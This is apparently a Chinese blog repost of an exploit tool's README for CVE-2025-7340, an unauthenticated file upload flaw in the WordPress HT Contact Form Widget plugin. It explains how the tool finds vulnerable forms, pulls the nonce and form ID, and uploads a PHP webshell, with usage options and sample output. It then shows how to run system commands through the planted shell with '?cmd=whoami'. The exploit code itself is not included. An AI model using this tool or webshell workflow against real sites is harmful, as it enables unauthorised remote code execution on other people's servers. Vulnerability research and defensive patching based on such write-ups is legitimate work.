WordPress HT Contact Form插件未授权任意文件上传漏洞(CVE-2025-7340)利用分析

本文详细分析了WordPress插件HT Contact Form Widget存在的未授权任意文件上传漏洞(CVE-2025-7340),包含漏洞描述、利用脚本使用方法及技术细节,该漏洞可导致远程代码执行。

🚨 HT Contact Form Widget <= 2.2.1 - 未授权任意文件上传漏洞(CVE-2025-7340)

CVE编号: CVE-2025-7340
CVSS评分: 9.8 (严重)

📝 漏洞描述

WordPress插件**HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder.**在2.2.1及之前版本中,temp_file_upload函数缺少文件类型验证,导致存在任意文件上传漏洞。

该漏洞允许未认证的攻击者向服务器上传任意文件,可能导致远程代码执行(RCE)


⚡ 漏洞利用脚本

本仓库包含一个Python利用脚本,可自动发现存在漏洞的表单并向目标网站上传Webshell。

脚本会智能检测所需参数(nonce, form_id, ajax endpoint),并将PHP Webshell上传至漏洞路径。

存在漏洞的表单URL示例:

1
http://target.com/contact/

目标页面必须包含存在漏洞的表单


📦 环境要求

运行脚本前需安装以下Python模块:

1
pip install -r requirements.txt

requirements.txt内容:

1
2
requests
colorama

� 使用方法

1
2
3
4
5
6
7
usage: CVE-2025-7340.py [-h] 

CVE-2025-7340漏洞利用脚本 - 未授权任意文件上传 | 作者: Khaled Alenazi (Nxploited)

options:
  -h, --help     显示帮助信息
  -u, --url URL  目标URL 例如 http(s)://target.com

选项说明:

选项 描述
-h, --help 显示帮助信息
-u, --url URL 目标URL 例如 http(s)://target.com/contact

🐚 Webshell使用说明

漏洞利用成功后,可通过给定路径访问上传的Webshell。

附加?cmd=<your_command>参数可执行系统命令。

✅ 示例:

1
http://target.com/wp-content/uploads/ht_form/temp/shell.php?cmd=whoami

🖥️ 示例输出

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
开始对目标进行漏洞利用...
获取目标页面...
提取参数...
获取Nonce: 346c441903
AJAX端点: http://nxploit.ddev.site/wp-admin/admin-ajax.php
表单ID: 86
生成Webshell...
上传Webshell,请稍候...

[+] 漏洞利用成功!

访问路径: wp-content/uploads/ht_form/temp/687590d90ac1c-shell.php

作者: Khaled Alenazi (Nxploited) - GitHub: https://github.com/Nxploited

🛑 免责声明

本工具仅用于教育研究目的
作者不对代码滥用造成的任何损害负责。
测试任何系统前请务必获得明确授权。


👨‍💻 作者

Khaled Alenazi (Nxploited)
GitHub: Nxploited

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计